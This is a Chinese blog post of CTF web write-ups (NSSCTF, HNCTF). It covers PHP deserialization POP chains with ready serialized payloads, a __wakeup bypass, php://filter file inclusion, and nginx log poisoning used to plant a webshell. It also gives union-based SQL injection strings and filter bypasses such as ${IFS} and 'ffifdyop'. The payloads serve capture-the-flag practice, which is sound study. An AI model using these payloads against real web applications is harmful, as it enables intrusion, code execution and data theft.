<h1 id="反序列化章节"><a href="#反序列化章节" class="headerlink" title="反序列化章节"></a>反序列化章节</h1><h2 id="ZJCTF-2019-NiZhuanSiWei"><a href="#ZJCTF-2019-NiZhuanSiWei" class="headerlink" title="[ZJCTF 2019]NiZhuanSiWei"></a>[ZJCTF 2019]NiZhuanSiWei</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php  </span><br><span class="line">$text &#x3D; $_GET[&quot;text&quot;];</span><br><span class="line">$file &#x3D; $_GET[&quot;file&quot;];</span><br><span class="line">$password &#x3D; $_GET[&quot;password&quot;];</span><br><span class="line">if(isset($text)&amp;&amp;(file_get_contents($text,&#39;r&#39;)&#x3D;&#x3D;&#x3D;&quot;welcome to the zjctf&quot;))&#123;</span><br><span class="line">    echo &quot;&lt;br&gt;&lt;h1&gt;&quot;.file_get_contents($text,&#39;r&#39;).&quot;&lt;&#x2F;h1&gt;&lt;&#x2F;br&gt;&quot;;</span><br><span class="line">    if(preg_match(&quot;&#x2F;flag&#x2F;&quot;,$file))&#123;</span><br><span class="line">        echo &quot;Not now!&quot;;</span><br><span class="line">        exit(); </span><br><span class="line">    &#125;else&#123;</span><br><span class="line">        include($file);  &#x2F;&#x2F;useless.php</span><br><span class="line">        $password &#x3D; unserialize($password);</span><br><span class="line">        echo $password;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">else&#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>



<h4 id="伪协议"><a href="#伪协议" class="headerlink" title="伪协议"></a>伪协议</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?filename&#x3D;php:&#x2F;&#x2F;filter&#x2F;convert.base64-encode&#x2F;resource&#x3D;xxx.php</span><br><span class="line">?filename&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;xxx.php</span><br></pre></td></tr></table></figure>





<h2 id="SWPUCTF-2021-新生赛-pop"><a href="#SWPUCTF-2021-新生赛-pop" class="headerlink" title="[SWPUCTF 2021 新生赛]pop"></a>[SWPUCTF 2021 新生赛]pop</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">error_reporting(0);</span><br><span class="line">show_source(&quot;index.php&quot;);</span><br><span class="line"></span><br><span class="line">class w44m&#123;</span><br><span class="line"></span><br><span class="line">    private $admin &#x3D; &#39;aaa&#39;;</span><br><span class="line">    protected $passwd &#x3D; &#39;123456&#39;;</span><br><span class="line"></span><br><span class="line">    public function Getflag()&#123;</span><br><span class="line">        if($this-&gt;admin &#x3D;&#x3D;&#x3D; &#39;w44m&#39; &amp;&amp; $this-&gt;passwd &#x3D;&#x3D;&#x3D;&#39;08067&#39;)&#123;</span><br><span class="line">            include(&#39;flag.php&#39;);</span><br><span class="line">            echo $flag;</span><br><span class="line">        &#125;else&#123;</span><br><span class="line">            echo $this-&gt;admin;</span><br><span class="line">            echo $this-&gt;passwd;</span><br><span class="line">            echo &#39;nono&#39;;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class w22m&#123;</span><br><span class="line">    public $w00m;</span><br><span class="line">    public function __destruct()&#123;</span><br><span class="line">        echo $this-&gt;w00m;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class w33m&#123;</span><br><span class="line">    public $w00m;</span><br><span class="line">    public $w22m;</span><br><span class="line">    public function __toString()&#123;</span><br><span class="line">        $this-&gt;w00m-&gt;&#123;$this-&gt;w22m&#125;();</span><br><span class="line">        return 0;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$w00m &#x3D; $_GET[&#39;w00m&#39;];</span><br><span class="line">unserialize($w00m);</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>链子构造</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">首先我们需要找到开头和结尾，相对而言结尾比较好找因此我们先找结尾</span><br><span class="line">结尾：发现在w44m中存在Getflag()方法，可以读取flag</span><br><span class="line">然后我们看看哪里能调用它，发现w33m中有一个调用</span><br><span class="line">那么再往上查看，w33m这个调用存在于tostring中，那么我们要找下会发现W22m中存在echo，那么可以调用w33m的方法</span><br><span class="line">那么我们就可以明确思路了</span><br><span class="line">首先创建一个w22m，将w22m中的w00m指向创建的w33m方法，这时候利用w33m中的w00m选择为我们要调用的w44m方法，最后将w33m中的w00m指向w44m中的方法即可</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class w44m&#123;</span><br><span class="line">    private $admin &#x3D; &#39;w44m&#39;;</span><br><span class="line">    protected $passwd &#x3D; &#39;08067&#39;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class w22m&#123;</span><br><span class="line">    public $w00m;</span><br><span class="line">    public function __destruct()&#123;</span><br><span class="line">        echo $this-&gt;w00m;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class w33m&#123;</span><br><span class="line">    public $w00m;</span><br><span class="line">    public $w22m;</span><br><span class="line">    public function __toString()&#123;</span><br><span class="line">        $this-&gt;w00m-&gt;&#123;$this-&gt;w22m&#125;();</span><br><span class="line">        return 0;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$o &#x3D; new w22m();</span><br><span class="line">$o-&gt;w00m &#x3D; new w33m();</span><br><span class="line">$o-&gt;w00m-&gt;w00m &#x3D; new w44m();</span><br><span class="line">$o-&gt;w00m-&gt;w22m &#x3D; &#39;Getflag&#39;;</span><br><span class="line">echo urlencode(serialize($o));</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D</span><br></pre></td></tr></table></figure>



<h2 id="天翼杯-2021-esay-eval"><a href="#天翼杯-2021-esay-eval" class="headerlink" title="[天翼杯 2021]esay_eval"></a>[天翼杯 2021]esay_eval</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class A&#123;</span><br><span class="line">    public $code &#x3D; &quot;&quot;;</span><br><span class="line">    function __call($method,$args)&#123;</span><br><span class="line">        eval($this-&gt;code);     </span><br><span class="line">    &#125;</span><br><span class="line">    function __wakeup()&#123;</span><br><span class="line">        $this-&gt;code &#x3D; &quot;&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">class B&#123;</span><br><span class="line">    function __destruct()&#123;</span><br><span class="line">        echo $this-&gt;a-&gt;a();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">if(isset($_REQUEST[&#39;poc&#39;]))&#123;</span><br><span class="line">    preg_match_all(&#39;&#x2F;&quot;[BA]&quot;:(.*?):&#x2F;s&#39;,$_REQUEST[&#39;poc&#39;],$ret);</span><br><span class="line">    if (isset($ret[1])) &#123;</span><br><span class="line">        foreach ($ret[1] as $i) &#123;</span><br><span class="line">            if(intval($i)!&#x3D;&#x3D;1)&#123;</span><br><span class="line">                exit(&quot;you want to bypass wakeup ? no !&quot;);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        unserialize($_REQUEST[&#39;poc&#39;]);    </span><br><span class="line">    &#125;</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>首先查看出口，发现A类中的__call存在eval执行函数</p>
<p>那么我们就要想办法触发它</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">该方法在调用的方法不存在时会自动调用，程序仍会继续执行下去。</span><br></pre></td></tr></table></figure>

<p>也就是说调用一个A类不存在的方法就会触发它，因此这时就关注到了echo $this-&gt;a-&gt;a();</p>
<p>但注意了，A类里面有一个__wakeup()方法，当我们创建的时候就会唤醒它，</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">unserialize()会检查是否存在一个 &#96;__wakeup()&#96; 方法。如果存在，则会先调用 &#96;__wakeup&#96; 方法，预先准备对象需要的资源。</span><br></pre></td></tr></table></figure>

<p>它会将code清零，那么我们就要想办法</p>
<p>常用的绕过方法有</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">改属性数量&gt;实际属性数量</span><br></pre></td></tr></table></figure>

<p>于是可以构造</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class A&#123;</span><br><span class="line">    public $code &#x3D; &quot;phpinfo();&quot;;</span><br><span class="line">    function __call($method,$args)&#123;</span><br><span class="line">        eval($this-&gt;code);     </span><br><span class="line">    &#125;</span><br><span class="line">    function __wakeup()&#123;</span><br><span class="line">        $this-&gt;code &#x3D; &quot;&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">class B&#123;</span><br><span class="line">    function __destruct()&#123;</span><br><span class="line">        echo $this-&gt;a-&gt;a();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">$o &#x3D; new B();</span><br><span class="line">$o-&gt;a&#x3D; new A();</span><br><span class="line">echo serialize($o);</span><br><span class="line"></span><br><span class="line">O:1:&quot;B&quot;:1:&#123;s:1:&quot;a&quot;;O:1:&quot;A&quot;:1:&#123;s:4:&quot;code&quot;;s:10:&quot;phpinfo();&quot;;&#125;&#125;</span><br><span class="line">绕过wake_up</span><br><span class="line">O:1:&quot;B&quot;:1:&#123;s:1:&quot;a&quot;;O:1:&quot;A&quot;:1:&#123;s:4:&quot;code&quot;;s:10:&quot;phpinfo();&quot;;&#125;s:1:&quot;a&quot;;N;&#125;</span><br></pre></td></tr></table></figure>

<p>然后发现phpinfo里面太多函数被禁用了，那就先改成一句话木马连下蚁剑</p>
<p>发现蚁剑里面权限不足只能看一个文件夹，但发现swp文件</p>
<p>swp文件恢复</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vim -r .daily.swp</span><br></pre></td></tr></table></figure>

<img src="/2022/10/25/NSSCTF/10/25/NSSCTF/image-20221105001936535.png" class title="image-20221105001936535">

<p>Redis加载恶意so获取shell，直接用蚁剑的插件连接，但不知道我的为什么下不下来</p>
<p>发现可以用github下放进插件库里面</p>
<p>但蚁剑还有别的好用插件可以，插件商城有一个绕过disable_function的下下来</p>
<img src="/2022/10/25/NSSCTF/10/25/NSSCTF/image-20221105010659458.png" class title="image-20221105010659458">



<h1 id="HNCTF（自由赛道）"><a href="#HNCTF（自由赛道）" class="headerlink" title="HNCTF（自由赛道）"></a>HNCTF（自由赛道）</h1><h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><h4 id="Interesting-include"><a href="#Interesting-include" class="headerlink" title="Interesting_include"></a>Interesting_include</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">&#x2F;&#x2F;WEB手要懂得搜索</span><br><span class="line">&#x2F;&#x2F;flag in .&#x2F;flag.php</span><br><span class="line"></span><br><span class="line">if(isset($_GET[&#39;filter&#39;]))&#123;</span><br><span class="line">    $file &#x3D; $_GET[&#39;filter&#39;];</span><br><span class="line">    if(!preg_match(&quot;&#x2F;flag&#x2F;i&quot;, $file))&#123;</span><br><span class="line">        die(&quot;error&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    include($file);</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p>这里注意关键词<strong>filter</strong>和<strong>include</strong>满足文件包含漏洞</p>
<p>那么可以尝试利用php://协议中的<strong>php://filter</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;43.143.7.97:28829&#x2F;?filter&#x3D;php:%2f%2ffilter%2fconvert.base64-encode%2fresource&#x3D;flag.php</span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;43.143.7.97:28829&#x2F;?filter&#x3D;php:&#x2F;&#x2F;filter&#x2F;convert.base64-encode&#x2F;resource&#x3D;flag.php</span><br></pre></td></tr></table></figure>

<h4 id="easy-include"><a href="#easy-include" class="headerlink" title="easy_include"></a>easy_include</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">&#x2F;&#x2F;WEB手要懂得搜索</span><br><span class="line"></span><br><span class="line">if(isset($_GET[&#39;file&#39;]))&#123;</span><br><span class="line">    $file &#x3D; $_GET[&#39;file&#39;];</span><br><span class="line">    if(preg_match(&quot;&#x2F;php|flag|data|\~|\!|\@|\#|\\$|\%|\^|\&amp;|\*|\(|\)|\-|\_|\+|\&#x3D;&#x2F;i&quot;, $file))&#123;</span><br><span class="line">        die(&quot;error&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    include($file);</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p>发现过滤了很多内容，文件包含中的伪协议好像都被过滤了，而且flag也被过滤有点</p>
<p>那么只能找其他方法了</p>
<h5 id="日志包含"><a href="#日志包含" class="headerlink" title="日志包含"></a>日志包含</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">apache服务器日志存放文件位置：&#x2F;var&#x2F;log&#x2F;apache&#x2F;access.log</span><br><span class="line">http:&#x2F;&#x2F;43.143.7.97:28001&#x2F;?file&#x3D;&#x2F;var&#x2F;log&#x2F;nginx&#x2F;access.log</span><br></pre></td></tr></table></figure>

<p>直接利用Burp在User-Agent字段中命令执行</p>
<img src="/2022/10/25/NSSCTF/10/25/NSSCTF/image-20221025204738209.png" class title="image-20221025204738209">

<p>写入一句话木马，利用蚁剑链接</p>
<img src="/2022/10/25/NSSCTF/10/25/NSSCTF/image-20221025204025185.png" class title="image-20221025204025185">



<h1 id="SQL注入篇"><a href="#SQL注入篇" class="headerlink" title="SQL注入篇"></a>SQL注入篇</h1><h3 id="普通注入"><a href="#普通注入" class="headerlink" title="普通注入"></a>普通注入</h3><p>eg:<strong>[SWPUCTF 2021 新生赛]easy_sql</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1&#39; order by 3--+</span><br><span class="line"> -1&#39; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema&#x3D;database()--+ 查询表名</span><br><span class="line"> -1&#39; union select 1,2,group_concat(column_name) from information_schema.columns where table_schema&#x3D;database() and table_name&#x3D;&quot;test_tb&quot;--+  查询字段名</span><br><span class="line"> -1&#39; union select 1,2,group_concat(id,flag) from test_tb--+</span><br></pre></td></tr></table></figure>

<h1 id="FLAG存放的位置"><a href="#FLAG存放的位置" class="headerlink" title="FLAG存放的位置"></a>FLAG存放的位置</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1.可能放在phpinfo中</span><br><span class="line">2.</span><br></pre></td></tr></table></figure>

<h1 id="各种绕过"><a href="#各种绕过" class="headerlink" title="各种绕过"></a>各种绕过</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from &#39;admin&#39; where password&#x3D;md5($pass,true)			利用特殊字符ffifdyop</span><br></pre></td></tr></table></figure>



<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">preg_match(&quot;&#x2F; &#x2F;&quot;</span><br><span class="line">利用$&#123;IFS&#125;绕过空格过滤</span><br></pre></td></tr></table></figure>



<p>RCE绕过</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;blog.csdn.net&#x2F;miuzzx&#x2F;article&#x2F;details&#x2F;109143413</span><br></pre></td></tr></table></figure>



<h1 id="思路突破"><a href="#思路突破" class="headerlink" title="思路突破"></a>思路突破</h1><p>1.查看网络中的显示</p>
<img src="/2022/10/25/NSSCTF/10/25/NSSCTF/image-20221026151913907.png" class title="image-20221026151913907"></div><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">墨水彩笔</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="http://example.com/2022/10/25/NSSCTF/">http://example.com/2022/10/25/NSSCTF/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="tag_share"><div class="post-meta__tag-list"></div><div class="post_share"><div class="social-share" data-image="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2022/10/25/XSS%E5%BC%B9%E7%AA%97%E4%B8%93%E9%A1%B9%E7%BB%83%E4%B9%A0/"><img class="prev-cover" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">Previous Post</div><div class="prev_info">XSS弹窗专项练习</div></div></a></div><div class="next-post pull-right"><a href="/2022/10/15/WEB-BUU%E5%88%B7%E9%A2%98/"><img class="next-cover" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">Next Post</div><div class="next_info">WEB-BUU刷题</div></div></a></div></nav></article></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2023 By 墨水彩笔</div><div class="framework-info"><span>Framework </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>Theme </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><section id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="Read Mode"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="Switch Between Light And Dark Mode"><i class="fas fa-adjust"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="Setting"><i class="fas fa-cog"></i></button><button class="close" id="mobile-toc-button" type="button" title="Table Of Contents"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="Back To Top"><i class="fas fa-arrow-up"></i></button></div></section><div><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><div class="js-pjax"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></div></body></html>